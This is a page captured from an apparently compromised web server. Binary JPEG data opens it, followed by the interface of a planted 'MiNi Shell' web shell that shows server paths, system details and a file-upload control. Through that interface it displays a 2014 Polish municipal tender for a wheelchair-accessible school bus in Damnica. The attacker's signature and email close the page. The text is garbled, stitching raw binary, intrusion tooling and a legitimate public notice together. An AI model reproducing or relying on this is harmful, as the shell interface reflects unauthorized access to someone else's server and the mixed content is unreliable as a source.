JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140228/42575-N-2014.html

<p class="kh_header"><b>Damnica: Zakup i dostawa fabrycznie nowego autobusu o ilości miejsc siedzących minimum 35 + kierowca + 1 miejsce dostosowane do przewozu osoby na wózku inwalidzkim</b><br>
<b>Numer ogłoszenia: 42575 - 2014; data zamieszczenia: 28.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Damnicy , ul. Górna 1, 76-231 Damnica, woj. pomorskie, tel. 059 8113046, faks 059 8484435.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ug.damnica.ibip.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa fabrycznie nowego autobusu o ilości miejsc siedzących minimum 35 + kierowca + 1 miejsce dostosowane do przewozu osoby na wózku inwalidzkim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa fabrycznie nowego autobusu o ilości miejsc siedzących minimum 35 + kierowca + 1 miejsce dostosowane do przewozu osoby na wózku inwalidzkim

Warunki techniczne jakie muszą być spełnione przez oferowany autobus:
Parametry ogólne
Pojemność autobusu: min. 35 miejsc siedzących + kierowca + 1 miejsce dostosowane do przewozu osoby na wózku inwalidzkim
Szerokość: min. 2,4 m, max. 2,55 m
Długość całkowita: min. 9 m, max. 11 m
Autobus powinien być przystosowany do przewozu osób niepełnosprawnych zgodnie z obowiązującymi przepisami prawa

Karoseria
1. Szyby wykonane ze szkła bezpiecznego;
2. Okna boczne w części przesuwane zamontowane, firanki w oknach; 
3. Zewnętrzne lusterka elektryczne podgrzewane;
4. Kolorystyka zewnętrzna - pomarańczowa;
5. Obicia i wykładziny wewnętrzne - nawiązujące do kolorystyki siedzeń pasażerskich;
6. Karoseria wykonana z materiałów odpornych na korozje.

Przedział pasażerski
1. Wentylacja - dachowy wentylator elektryczny;
2. Ogrzewanie niezależne;
3. Instalacja nagłaśniająca w całym autobusie z radioodtwarzaczem;
4. Podłoga ze sklejki wodoodpornej;
5. Wnętrze wykładziny w kolorze dopasowanym do ogólnej kolorystyki autobusu - zgodnie z zasadami doboru kolorów i wysokiej estetyki; podłoga pokryta wykładziną
antypoślizgową, umożliwiającą mycie urządzeniami mechanicznymi, łatwą do sprzątania i mycia na całej długości autobusu.
6. oznakowana przestrzeń przeznaczona dla pasażera niepełnosprawnego na wózku inwalidzkim zgodnie z Rozporządzeniem z dn. 31.12.2002 r. w sprawie warunków technicznych oraz zakresu ich niezbędnego wyposażenia (Dz. U. 2003 r. Nr 32. poz. 262, z poźn. zm.)

Kabina kierowcy
1. Wyposażona w 1 nagrzewnicę i nawiew chłodnego powietrza; 
2. Wyposażona w otwierane okno z lewej strony (w drzwiach kierowcy), wieszak na odzież;
3. Fotel kierowcy tapicerowany z poduszką pneumatyczną;
4. Deska rozdzielcza wyposażona w tachograf;
5. Osłona przeciwsłoneczna;
6. Lusterko wewnętrzne.

Siedzenia
Siedzenia pasażerskie miękkie tapicerowane:
1. skierowane do przodu, powinny być wyposażone w pasy bezpieczeństwa,
2. siedzenia skrajne wyposażone w elementy zabezpieczające pasażerów przed przemieszczeniem w bok,
3. miejsca do siedzenia miały wymiary i rozmieszczenie określone w tabeli nr 1 Wymiary i rozmieszczenie siedzeń w autobusie szkolnym, zamieszczonej w załączniku nr 8 do Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. Nr 32 z 2003 r. poz. 262 z późn.zm.)

Drzwi
1) Drzwi kierowcy otwierane mechanicznie; ilość - 1 szt.;
2) Drzwi pasażerskie jednoskrzydłowe, sterowane elektropneumatycznie z miejsca kierowcy - 2 szt.;
3) Mechanizm zapobiegający ruszaniu pojazdu z otwartymi drzwiami.

Silnik
Rodzaj paliwa - olej napędowy;
a) Moc minimum 145 kW;
b) Posiadający turbodoładowanie;
c) Spełniający normę EURO 5 w zakresie emisji i hałasu

Układ przeniesienia napędu
1) Zawieszenie przednie oraz tylne pneumatyczne;
2) Skrzynia biegów manualna sześciobiegowa plus bieg wsteczny.

Układ kierowniczy
Ze wspomaganiem.


Układ hamulcowy
1) Hamulce tarczowe na obu osiach;
2) System ABS.

Koła
Wyważone;
Opony bezdętkowe;
Opony wszystkich kół w jednakowym rozmiarze  nie mniejsze niż  R 17,5.

Pozostałe wyposażenie i urządzenia
1) Kolo zapasowe;
2) Dwie gaśnice, apteczka, zestaw narzędzi, kpl. klinów pod koła;

Autobus powinien być zbudowany w taki sposób, by spełniał wymogi Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. Nr 32 z 2003 r. poz. 262 z późn. zm.) oraz był zgodny z ustawą z dnia 20 czerwca 1997 r. Prawo o Ruchu Drogowym (tekst jednolity Dz.U. Nr 108 z 2005 r. poz. 908). 
Autobus powinien być tak zbudowany, aby:
1)miejsce kierowcy nie znajdowało się w kabinie wydzielonej z przestrzeni pasażerskiej;
2)drzwi spełniały następujące wymagania:
a)były zdalnie sterowane z miejsca kierowcy; przepisu nie stosuje się do drzwi tylnych, o ile istnieją,
b)możliwe było zablokowanie ich otwarcia od wewnątrz z miejsca kierowcy; funkcja ta nie może ograniczać działania układu awaryjnego otwierania drzwi,
c)były automatycznie blokowane, gdy pojazd porusza się z prędkością przekraczającą 5 kmh,
d)otwarcie drzwi było sygnalizowane przerywanym sygnałem akustycznym o nieprzenikliwym dźwięku wewnątrz autobusu; funkcja ta może być wyłączona, gdy autobus nie przewozi dzieci,
e)spełniały warunek zapobiegania niebezpieczeństwu odniesienia obrażeń przez pasażera spowodowanych ruchem drzwi i jego uwięzieniem podczas ich zamykania, poprzez zastosowanie mechanizmu samopowrotu, szerokich i miękkich uszczelek lub innych podobnych rozwiązań;
3)był wyposażony w:
a)miejsce z przodu i z tyłu wewnątrz pojazdu przeznaczone na umieszczenie tablicy AUTOBUS SZKOLNY określonej w przepisach w sprawie rejestracji i oznaczania pojazdów,
b)miejsce z przodu i z tyłu po lewej stronie pojazdu na wysokości od 60 cm do 180 cm od powierzchni jezdni przeznaczone na umieszczenie tablicy ze znakiem STOP, określonej w przepisach w sprawie rejestracji i oznaczania pojazdów, wyposażone w urządzenie uwidaczniające tę tablicę sterowane z miejsca kierowcy; działanie urządzenia powinno być automatyczne po otwarciu drzwi autobusu i sygnalizowane kierowcy lampką kontrolną koloru czerwonego; powinna istnieć możliwość wyłączenia tej funkcji,
c)miejsce z przodu i z tyłu po lewej stronie pojazdu przeznaczone na umieszczenie kwadratowej tablicy barwy żółtej z symbolem dzieci barwy czarnej określonej w przepisach w sprawie rejestracji i oznaczania pojazdów; miejsce z tyłu pojazdu powinno być oświetlone, z możliwością wyłączenia oświetlenia z miejsca kierowcy,
d)ostrzegawczy sygnał świetlny błyskowy,  włączający się wraz ze światłami awaryjnymi automatycznie przy otwartych drzwiach; powinna istnieć możliwość wyłączenia tej funkcji przez kierowcę,
e)sygnał akustyczny ostrzegający na zewnątrz o cofaniu pojazdu,
f)urządzenie zapobiegające przed ruszeniem pojazdu z otwartymi drzwiami, także na pochyłościach;
4)okna uniemożliwiały wychylanie się na zewnątrz;
  5)liczba miejsc stojących nie przekraczała 25% liczby siedzeń, przy czym dopuszcza się zwiększenie tej liczby o 4, w przypadku gdy w przestrzeni, o której mowa w pkt 6 (poniżej), nie jest przewożony pasażer na wózku inwalidzkim; powierzchnią przeznaczoną na miejsca stojące może być powierzchnia, nad którą wysokość wolnej przestrzeni wynosi co najmniej 190 cm lub co najmniej 180 cm w przypadku części przejścia usytuowanego ponad tylną osią i za nią;
   6)istniała oznakowana przestrzeń przeznaczona dla pasażera niepełnosprawnego na wózku inwalidzkim, taka, która:
a)umożliwia przewóz co najmniej jednej osoby na wózku inwalidzkim tyłem do kierunku jazdy,
b)jest wyposażona w pas bezpieczeństwa ze zwijaczem i blokadą, umożliwiający zapięcie pasażera wraz z wózkiem, a dostęp do niej jest zapewniony przez urządzenie do załadunku i wyładunku będące na wyposażeniu autobusu; w przestrzeni tej mogą być umieszczone siedzenia składane, o ile zachowane będą powyższe warunki, gdy siedzenia są złożone;

Wymagania dodatkowe:
Autobus musi posiadać homologacje. 
Świadectwo homologacji lub decyzje zwalniającą należy dołączyć do oferty. 
Nie dopuszcza się dostawy autobusów wykonanych jako prototyp, serie próbne lub małe, produkcja jednostkowa.
Oferowany typ autobusu musi być eksploatowany w Polsce w ilości nie mniejszej niż 15 szt. 
Autoryzowane stacje obsługi dla dostarczonego autobusu muszą spełniać następujące wymagania w celu zapewnienia w pełnym zakresie obsług bieżących oraz napraw powypadkowych:
dysponować pełną aktualna dokumentacja techniczną w skład , której wchodzą m. in.: schematy instalacji (elektrycznej), katalogi części zamiennych całego autobusu, instrukcje napraw.
dysponować niezbędnym zapleczem technicznym (na terenie stacji, której odległość od siedziby Zamawiającego nie może być większa niż 50 km) m.in. budynkiem serwisu wyposażonym w podnośniki hydrauliczne lub kanał obsługowy, budynkiem napraw blacharskich, profesjonalna kabina lakierniczą ( o parametrach pozwalających na lakierowanie autobusów o długości 11 metrów), komputerem do diagnostyki silnika oraz innymi narzędziami niezbędnymi do pełnej płynnej obsługi bieżącej oraz napraw powypadkowych.
dysponować przeszkolona kadrą posiadającą doświadczenie w zakresie obsług oraz napraw autobusów oferowanej marki oraz typu.
posiadać zapas części zamiennych (specyfikacja części zapewniającą szybkie wykonanie naprawy) o wartości minimum 50.000 PLN
Zamawiający zastrzega sobie możliwość przeprowadzenia kontroli obiektów stacji obsługi i sprawdzenia spełnienia ww. wymaganych warunków. Wykonawca zobligowany będzie do umożliwienia Zamawiającemu wstępu na teren stacji oraz wglądu do dokumentacji technicznej.
Wykonawca wyda pojazd wraz z cała dokumentacja samochodu, w tym instrukcja obsługi, dokumentem gwarancyjnym oraz świadectwem homologacji lub decyzja zwalniającą z uzyskania świadectwa homologacji.
Wykonawca udzieli gwarancja minimum 24 miesiące na cały autobus.
Zamówienie  jest współfinansowane ze środków PFRON w ramach Programu wyrównywania różnic między regionami II..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.12.11.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłożenie dokumentu - Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oprciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłożenie wykazu posiadanych punktów serwisowych  w odległości do 50 km od siedziby Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Parafowany projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, dotyczących:
- zmian osób reprezentujących strony umowy
W przypadku zmian osób uprawnionych do reprezentowania zamawiającego lub wykonawcy strony dokonają stosownych zmian w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug.damnica.ibip.pl/public/?id=119284<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Damnica, ul. Górna 1, 76-231 Damnica, pok. nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2014 godzina 10:00, miejsce: Urząd Gminy Damnica, ul. Górna 1, 76-231 Damnica, pok. nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie  jest współfinansowane ze środków PFRON w ramach Programu wyrównywania różnic między regionami II.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com